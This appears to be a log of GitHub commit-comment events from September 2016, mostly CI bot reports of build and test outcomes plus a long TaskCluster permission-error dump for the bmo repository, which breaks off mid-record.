{"id":"4639620355","type":"CommitCommentEvent","actor":{"login":"anjdreas"},"repo":{"name":"anjdreas/UnitsNet"},"payload":{"comment":{"id":19230097,"position":null,"line":null,"path":null,"commit_id":"cbc4b3774e5fa9c8bdc84dbe68784e42fb2d4dff","created_at":"2016-09-29T20:05:22Z","updated_at":"2016-09-29T20:05:22Z","body":"TeamCity Units.NET :: Build and Test [Build 165](http://teamcity.chump.work/viewLog.html?buildId=719&buildTypeId=UnitsNet_BuildTest) outcome was **SUCCESS**\nSummary: Tests passed: 820 Build time: 0:0:27"}},"created_at":"2016-09-29T20:05:22Z"}
{"id":"4639621665","type":"CommitCommentEvent","actor":{"login":"anjdreas"},"repo":{"name":"anjdreas/UnitsNet"},"payload":{"comment":{"id":19230100,"position":null,"line":null,"path":null,"commit_id":"cbc4b3774e5fa9c8bdc84dbe68784e42fb2d4dff","created_at":"2016-09-29T20:05:37Z","updated_at":"2016-09-29T20:05:37Z","body":"TeamCity Units.NET :: Publish NuGets [Build 165](http://teamcity.chump.work/viewLog.html?buildId=721&buildTypeId=UnitsNet_Publish) is now running\n"}},"created_at":"2016-09-29T20:05:37Z"}
{"id":"4639622597","type":"CommitCommentEvent","actor":{"login":"themsaid"},"repo":{"name":"laravel/framework"},"payload":{"comment":{"id":19230101,"position":null,"line":null,"path":null,"commit_id":"b681bffc247ebac1fbb4afcec03e2ce12627e0cc","created_at":"2016-09-29T20:05:47Z","updated_at":"2016-09-29T20:05:47Z","body":"😬"}},"created_at":"2016-09-29T20:05:47Z"}
{"id":"4639623146","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19230104,"position":null,"line":null,"path":null,"commit_id":"efce78bc946ce268ca9ef75a12d4f022cd1c7d4c","created_at":"2016-09-29T20:05:53Z","updated_at":"2016-09-29T20:05:53Z","body":"EMS (brianlball) - i386-Windows-7-VisualStudio-12: Tests Failed (2118 of 2497 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-efce78bc946ce268ca9ef75a12d4f022cd1c7d4c-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-efce78bc946ce268ca9ef75a12d4f022cd1c7d4c-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-84.82%25-red.svg)</a> \n"}},"created_at":"2016-09-29T20:05:53Z"}
{"id":"4639624236","type":"CommitCommentEvent","actor":{"login":"ezyang"},"repo":{"name":"haskell/cabal"},"payload":{"comment":{"id":19230109,"position":null,"line":null,"path":null,"commit_id":"0c99981f1d1a4ddf9bb3d57f2d6cf371e125df40","created_at":"2016-09-29T20:06:05Z","updated_at":"2016-09-29T20:06:05Z","body":"I think that is a pretty reasonable way to do it."}},"created_at":"2016-09-29T20:06:05Z"}
{"id":"4639624834","type":"CommitCommentEvent","actor":{"login":"anjdreas"},"repo":{"name":"anjdreas/UnitsNet"},"payload":{"comment":{"id":19230111,"position":null,"line":null,"path":null,"commit_id":"cbc4b3774e5fa9c8bdc84dbe68784e42fb2d4dff","created_at":"2016-09-29T20:06:11Z","updated_at":"2016-09-29T20:06:11Z","body":"TeamCity Units.NET :: Publish NuGets [Build 165](http://teamcity.chump.work/viewLog.html?buildId=721&buildTypeId=UnitsNet_Publish) outcome was **SUCCESS**\nSummary: Running Build time: 0:0:34"}},"created_at":"2016-09-29T20:06:11Z"}
{"id":"4639624906","type":"CommitCommentEvent","actor":{"login":"mojilat"},"repo":{"name":"mojilat/-"},"payload":{"comment":{"id":19230112,"position":7,"line":233,"path":"bot/bot.lua","commit_id":"68f00d02fdb657fb99c08e18bdf86fde83f5cb8e","created_at":"2016-09-29T20:06:12Z","updated_at":"2016-09-29T20:06:12Z","body":"Mojilat"}},"created_at":"2016-09-29T20:06:12Z"}
{"id":"4639629390","type":"CommitCommentEvent","actor":{"login":"TEC10101"},"repo":{"name":"TEC10101/SQL-createdB-querydB"},"payload":{"comment":{"id":19230129,"position":null,"line":null,"path":null,"commit_id":"f8b1bc85ff3d7d04d5d4dec3d37027eec03003f9","created_at":"2016-09-29T20:07:01Z","updated_at":"2016-09-29T20:07:01Z","body":"**Some of the data is copied/pasted and may seem stale**, however we were not given data to enter, and normally databases are created over time, so the most time-efficient strategy was to cheese the data into the dB."}},"created_at":"2016-09-29T20:07:01Z"}
{"id":"4639629640","type":"CommitCommentEvent","actor":{"login":"justinclift"},"repo":{"name":"sqlitebrowser/sqlitebrowser"},"payload":{"comment":{"id":19230131,"position":null,"line":null,"path":null,"commit_id":"8be2c54f51f174e1bf9e728e41f28d5a95b2cdb4","created_at":"2016-09-29T20:07:03Z","updated_at":"2016-09-29T20:07:03Z","body":"Really glad you did this.  It would have taken me **ages** to figure that out."}},"created_at":"2016-09-29T20:07:03Z"}
{"id":"4639631618","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-bteam/bmo"},"payload":{"comment":{"id":19230135,"position":null,"line":null,"path":null,"commit_id":"b205285d4b5904a59d53107ec8c423eb1890725d","created_at":"2016-09-29T20:07:25Z","updated_at":"2016-09-29T20:07:25Z","body":"Submitting the task to TaskCluster failed. You didn't give the task-graph scopes allowing it define tasks on the queue.Details:\n\n```js\n[\n    {\n        \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"queue:route:notify.email.dylan@hardison.net.on-any\\\",\\n    \\\"queue:route:notify.irc-channel.#bteam.on-failed\\\",\\n    \\\"queue:route:notify.irc-channel.#bteam.on-exception\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla-bteam/bmo:branch:development\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:define-task:aws-provisioner-v1/b2gtest\\\",\\n  \\\"queue:route:gaia-taskcluster\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-development.*\\\",\\n  \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-master.*\\\",\\n  \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n  \\\"queue:route:tc-treeherder.bmo-development.*\\\",\\n  \\\"queue:route:tc-treeherder.bmo-master.*\\\",\\n  \\\"queue:route:tc-treeherder.bmo-upstream-merge.*\\\",\\n  \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-development.*\\\",\\n  \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-master.*\\\",\\n  \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"queue:route:notify.email.dylan@hardison.net.on-any\\\", and\\n    - \\\"queue:route:notify.irc-channel.#bteam.on-failed\\\", and\\n    - \\\"queue:route:notify.irc-channel.#bteam.on-exception\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"b3f_wXOmTeylwMj_67oqzQ\\\"}\\n  payload:  {\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"routes\\\": [\\n    \\\"notify.email.dylan@hardison.net.on-any\\\",\\n    \\\"notify.irc-channel.#bteam.on-failed\\\",\\n    \\\"notify.irc-channel.#bteam.on-exception\\\"\\n  ],\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.opened\\\",\\n        \\\"pull_request.synchronize\\\",\\n        \\\"pull_request.reopened\\\",\\n        \\\"push\\\"\\n      ]\\n    },\\n    \\\"treeherder\\\": {\\n      \\\"symbol\\\": \\\"San\\\",\\n      \\\"machine\\\": {\\n        \\\"platform\\\": \\\"linux64\\\",\\n        \\\"build\\\": {\\n          \\\"platform\\\": \\\"linux64\\\"\\n        }\\n      }\\n    }\\n  },\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 3600,\\n    \\\"reruns\\\": 3,\\n    \\\"image\\\": \\\"mozillabteam/bmo-ci\\\",\\n    \\\"command\\\": [\\n      \\\"runtests.sh\\\"\\n    ],\\n    \\\"env\\\": {\\n      \\\"TEST_SUITE\\\": \\\"sanity\\\",\\n      \\\"GITHUB_EVENT\\\": \\\"push\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"development\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"4250271527caadb3eefd54ccf068f610f5d93a46\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"development\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/mozilla-bteam/bmo.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"dylanwh\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"b205285d4b5904a59d53107ec8c423eb1890725d\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"development\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"dylan@hardison.net\\\"\\n    },\\n    \\\"artifacts\\\": {\\n      \\\"public/runtests_log\\\": {\\n        \\\"type\\\": \\\"file\\\",\\n        \\\"path\\\": \\\"/var/log/runtests.log\\\",\\n        \\\"expires\\\": \\\"2018-02-17T17:33:38.806Z\\\"\\n      }\\n    }\\n  },\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"Basic Sanity Tests\\\",\\n    \\\"description\\\": \\\"Basic Sanity Tests\\\",\\n    \\\"owner\\\": \\\"dylan@hardison.net\\\",\\n    \\\"source\\\": \\\"https://github.com/mozilla-bteam/bmo.git\\\"\\n  },\\n  \\\"created\\\": \\\"2016-09-29T20:07:24.721Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-30T20:07:24.721Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"LIKR829ZSD6rLo8k_7bUQg\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"scopes\\\": [],\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-30T20:07:24.721Z\\\"\\n}\\n  time:     2016-09-29T20:07:24.935Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"queue:route:notify.email.dylan@hardison.net.on-any\\\",\\n      \\\"queue:route:notify.irc-channel.#bteam.on-failed\\\",\\n      \\\"queue:route:notify.irc-channel.#bteam.on-exception\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla-bteam/bmo:branch:development\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:define-task:aws-provisioner-v1/b2gtest\\\",\\n    \\\"queue:route:gaia-taskcluster\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-development.*\\\",\\n    \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-master.*\\\",\\n    \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n    \\\"queue:route:tc-treeherder.bmo-development.*\\\",\\n    \\\"queue:route:tc-treeherder.bmo-master.*\\\",\\n    \\\"queue:route:tc-treeherder.bmo-upstream-merge.*\\\",\\n    \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-development.*\\\",\\n    \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-master.*\\\",\\n    \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n        \"error\": {\n            \"code\": \"InsufficientScopes\",\n            \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"queue:route:notify.email.dylan@hardison.net.on-any\\\",\\n    \\\"queue:route:notify.irc-channel.#bteam.on-failed\\\",\\n    \\\"queue:route:notify.irc-channel.#bteam.on-exception\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla-bteam/bmo:branch:development\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:define-task:aws-provisioner-v1/b2gtest\\\",\\n  \\\"queue:route:gaia-taskcluster\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-development.*\\\",\\n  \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-master.*\\\",\\n  \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n  \\\"queue:route:tc-treeherder.bmo-development.*\\\",\\n  \\\"queue:route:tc-treeherder.bmo-master.*\\\",\\n  \\\"queue:route:tc-treeherder.bmo-upstream-merge.*\\\",\\n  \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-development.*\\\",\\n  \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-master.*\\\",\\n  \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"queue:route:notify.email.dylan@hardison.net.on-any\\\", and\\n    - \\\"queue:route:notify.irc-channel.#bteam.on-failed\\\", and\\n    - \\\"queue:route:notify.irc-channel.#bteam.on-exception\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"b3f_wXOmTeylwMj_67oqzQ\\\"}\\n  payload:  {\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"routes\\\": [\\n    \\\"notify.email.dylan@hardison.net.on-any\\\",\\n    \\\"notify.irc-channel.#bteam.on-failed\\\",\\n    \\\"notify.irc-channel.#bteam.on-exception\\\"\\n  ],\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.opened\\\",\\n        \\\"pull_request.synchronize\\\",\\n        \\\"pull_request.reopened\\\",\\n        \\\"push\\\"\\n      ]\\n    },\\n    \\\"treeherder\\\": {\\n      \\\"symbol\\\": \\\"San\\\",\\n      \\\"machine\\\": {\\n        \\\"platform\\\": \\\"linux64\\\",\\n        \\\"build\\\": {\\n          \\\"platform\\\": \\\"linux64\\\"\\n        }\\n      }\\n    }\\n  },\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 3600,\\n    \\\"reruns\\\": 3,\\n    \\\"image\\\": \\\"mozillabteam/bmo-ci\\\",\\n    \\\"command\\\": [\\n      \\\"runtests.sh\\\"\\n    ],\\n    \\\"env\\\": {\\n      \\\"TEST_SUITE\\\": \\\"sanity\\\",\\n      \\\"GITHUB_EVENT\\\": \\\"push\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"development\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"4250271527caadb3eefd54ccf068f610f5d93a46\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"development\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/mozilla-bteam/bmo.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"dylanwh\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"b205285d4b5904a59d53107ec8c423eb1890725d\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"development\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"dylan@hardison.net\\\"\\n    },\\n    \\\"artifacts\\\": {\\n      \\\"public/runtests_log\\\": {\\n        \\\"type\\\": \\\"file\\\",\\n        \\\"path\\\": \\\"/var/log/runtests.log\\\",\\n        \\\"expires\\\": \\\"2018-02-17T17:33:38.806Z\\\"\\n      }\\n    }\\n  },\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"Basic Sanity Tests\\\",\\n    \\\"description\\\": \\\"Basic Sanity Tests\\\",\\n    \\\"owner\\\": \\\"dylan@hardison.net\\\",\\n    \\\"source\\\": \\\"https://github.com/mozilla-bteam/bmo.git\\\"\\n  },\\n  \\\"created\\\": \\\"2016-09-29T20:07:24.721Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-30T20:07:24.721Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"LIKR829ZSD6rLo8k_7bUQg\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"scopes\\\": [],\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-30T20:07:24.721Z\\\"\\n}\\n  time:     2016-09-29T20:07:24.935Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"queue:route:notify.email.dylan@hardison.net.on-any\\\",\\n      \\\"queue:route:notify.irc-channel.#bteam.on-failed\\\",\\n      \\\"queue:route:notify.irc-channel.#bteam.on-exception\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla-bteam/bmo:branch:development\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:define-task:aws-provisioner-v1/b2gtest\\\",\\n    \\\"queue:route:gaia-taskcluster\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-development.*\\\",\\n    \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-master.*\\\",\\n    \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n    \\\"queue:route:tc-treeherder.bmo-development.*\\\",\\n    \\\"queue:route:tc-treeherder.bmo-master.*\\\",\\n    \\\"queue:route:tc-treeherder.bmo-upstream-merge.*\\\",\\n    \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-development.*\\\",\\n    \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-master.*\\\",\\n    \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n            \"requestInfo\": {\n                \"method\": \"defineTask\",\n                \"params\": {\n                    \"taskId\": \"b3f_wXOmTeylwMj_67oqzQ\"\n                },\n                \"payload\": {\n                    \"provisionerId\": \"aws-provisioner-v1\",\n                    \"workerType\": \"github-worker\",\n                    \"routes\": [\n                        \"notify.email.dylan@hardison.net.on-any\",\n                        \"notify.irc-channel.#bteam.on-failed\",\n                        \"notify.irc-channel.#bteam.on-exception\"\n                    ],\n                    \"extra\": {\n                        \"github\": {\n                            \"env\": true,\n                            \"events\": [\n                                \"pull_request.opened\",\n                                \"pull_request.synchronize\",\n                                \"pull_request.reopened\",\n                                \"push\"\n                            ]\n                        },\n                        \"treeherder\": {\n                            \"symbol\": \"San\",\n                            \"machine\": {\n                                \"platform\": \"linux64\",\n                                \"build\": {\n                                    \"platform\": \"linux64\"\n                                }\n                            }\n                        }\n                    },\n                    \"payload\": {\n                        \"maxRunTime\": 3600,\n                        \"reruns\": 3,\n                        \"image\": \"mozillabteam/bmo-ci\",\n                        \"command\": [\n                            \"runtests.sh\"\n                        ],\n                        \"env\": {\n                            \"TEST_SUITE\": \"sanity\",\n                            \"GITHUB_EVENT\": \"push\",\n                            \"GITHUB_BRANCH\": \"development\",\n                            \"GITHUB_BASE_SHA\": \"4250271527caadb3eefd54ccf068f610f5d93a46\",\n                            \"GITHUB_BASE_BRANCH\": \"development\",\n                            \"GITHUB_HEAD_REPO_URL\": \"https://github.com/mozilla-bteam/bmo.git\",\n                            \"GITHUB_HEAD_USER\": \"dylanwh\",\n                            \"GITHUB_HEAD_SHA\": \"b205285d4b5904a59d53107ec8c423eb1890725d\",\n                            \"GITHUB_HEAD_BRANCH\": \"development\",\n                            \"GITHUB_HEAD_USER_EMAIL\": \"dylan@hardison.net\"\n                        },\n                        \"artifacts\": {\n                            \"public/runtests_log\": {\n                                \"type\": \"file\",\n                                \"path\": \"/var/log/runtests.log\",\n                                \"expires\": \"2018-02-17T17:33:38.806Z\"\n                            }\n                        }\n                    },\n                    \"metadata\": {\n                        \"name\": \"Basic Sanity Tests\",\n                        \"description\": \"Basic Sanity Tests\",\n                        \"owner\": \"dylan@hardison.net\",\n                        \"source\": \"https://github.com/mozilla-bteam/bmo.git\"\n                    },\n                    \"created\": \"2016-09-29T20:07:24.721Z\",\n                    \"deadline\": \"2016-09-30T20:07:24.721Z\",\n                    \"schedulerId\": \"task-graph-scheduler\",\n                    \"taskGroupId\": \"LIKR829ZSD6rLo8k_7bUQg\",\n                    \"dependencies\": [],\n                    \"requires\": \"all-completed\",\n                    \"priority\": \"normal\",\n                    \"retries\": 5,\n                    \"scopes\": [],\n                    \"tags\": {},\n                    \"expires\": \"2017-09-30T20:07:24.721Z\"\n                },\n                \"time\": \"2016-09-29T20:07:24.935Z\"\n            },\n            \"details\": {\n                \"scopesets\": [\n                    [\n                        \"queue:route:notify.email.dylan@hardison.net.on-any\",\n                        \"queue:route:notify.irc-channel.#bteam.on-failed\",\n                        \"queue:route:notify.irc-channel.#bteam.on-exception\"\n                    ]\n                ],\n                \"scopes\": [\n                    \"assume:repo:github.com/mozilla-bteam/bmo:branch:development\",\n                    \"queue:create-task:aws-provisioner-v1/github-worker\",\n                    \"queue:define-task:aws-provisioner-v1/b2gtest\",\n                    \"queue:route:gaia-taskcluster\",\n                    \"queue:route:index.garbage.*\",\n                    \"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-development.*\",\n                    \"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-master.*\",\n                    \"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-upstream-merge.*\",\n                    \"queue:route:tc-treeherder.bmo-development.*\",\n                    \"queue:route:tc-treeherder.bmo-master.*\",\n                    \"queue:route:tc-treeherder.bmo-upstream-merge.*\",\n                    \"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-development.*\",\n                    \"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-master.*\",\n                    \"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-upstream-merge.*\",\n                    \"secrets:get:garbage/*\",\n                    \"secrets:set:garbage/*\"\n                ]\n            }\n        }\n    },\n    {\n        \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"queue:route:notify.email.dylan@hardison.net.on-any\\\",\\n    \\\"queue:route:notify.irc-channel.#bteam.on-failed\\\",\\n    \\\"queue:route:notify.irc-channel.#bteam.on-exception\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla-bteam/bmo:branch:development\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:define-task:aws-provisioner-v1/b2gtest\\\",\\n  \\\"queue:route:gaia-taskcluster\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-development.*\\\",\\n  \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-master.*\\\",\\n  \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n  \\\"queue:route:tc-treeherder.bmo-development.*\\\",\\n  \\\"queue:route:tc-treeherder.bmo-master.*\\\",\\n  \\\"queue:route:tc-treeherder.bmo-upstream-merge.*\\\",\\n  \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-development.*\\\",\\n  \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-master.*\\\",\\n  \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"queue:route:notify.email.dylan@hardison.net.on-any\\\", and\\n    - \\\"queue:route:notify.irc-channel.#bteam.on-failed\\\", and\\n    - \\\"queue:route:notify.irc-channel.#bteam.on-exception\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"IrDzAa-2SwiocjaUVKA-KA\\\"}\\n  payload:  {\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"routes\\\": [\\n    \\\"notify.email.dylan@hardison.net.on-any\\\",\\n    \\\"notify.irc-channel.#bteam.on-failed\\\",\\n    \\\"notify.irc-channel.#bteam.on-exception\\\"\\n  ],\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.opened\\\",\\n        \\\"pull_request.synchronize\\\",\\n        \\\"pull_request.reopened\\\",\\n        \\\"push\\\"\\n      ]\\n    },\\n    \\\"treeherder\\\": {\\n      \\\"symbol\\\": \\\"Doc\\\",\\n      \\\"machine\\\": {\\n        \\\"platform\\\": \\\"linux64\\\",\\n        \\\"build\\\": {\\n          \\\"platform\\\": \\\"linux64\\\"\\n        }\\n      }\\n    }\\n  },\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 3600,\\n    \\\"reruns\\\": 3,\\n    \\\"image\\\": \\\"mozillabteam/bmo-ci\\\",\\n    \\\"command\\\": [\\n      \\\"runtests.sh\\\"\\n    ],\\n    \\\"env\\\": {\\n      \\\"TEST_SUITE\\\": \\\"docs\\\",\\n      \\\"GITHUB_EVENT\\\": \\\"push\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"development\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"4250271527caadb3eefd54ccf068f610f5d93a46\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"development\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/mozilla-bteam/bmo.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"dylanwh\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"b205285d4b5904a59d53107ec8c423eb1890725d\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"development\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"dylan@hardison.net\\\"\\n    },\\n    \\\"artifacts\\\": {\\n      \\\"public/runtests_log\\\": {\\n        \\\"type\\\": \\\"file\\\",\\n        \\\"path\\\": \\\"/var/log/runtests.log\\\",\\n        \\\"expires\\\": \\\"2018-02-17T17:33:38.806Z\\\"\\n      }\\n    }\\n  },\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"Documentation Build Test\\\",\\n    \\\"description\\\": \\\"Documentation Build Test\\\",\\n    \\\"owner\\\": \\\"dylan@hardison.net\\\",\\n    \\\"source\\\": \\\"https://github.com/mozilla-bteam/bmo.git\\\"\\n  },\\n  \\\"created\\\": \\\"2016-09-29T20:07:24.725Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-30T20:07:24.725Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"LIKR829ZSD6rLo8k_7bUQg\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"scopes\\\": [],\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-30T20:07:24.725Z\\\"\\n}\\n  time:     2016-09-29T20:07:24.930Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"queue:route:notify.email.dylan@hardison.net.on-any\\\",\\n      \\\"queue:route:notify.irc-channel.#bteam.on-failed\\\",\\n      \\\"queue:route:notify.irc-channel.#bteam.on-exception\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla-bteam/bmo:branch:development\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:define-task:aws-provisioner-v1/b2gtest\\\",\\n    \\\"queue:route:gaia-taskcluster\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-development.*\\\",\\n    \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-master.*\\\",\\n    \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n    \\\"queue:route:tc-treeherder.bmo-development.*\\\",\\n    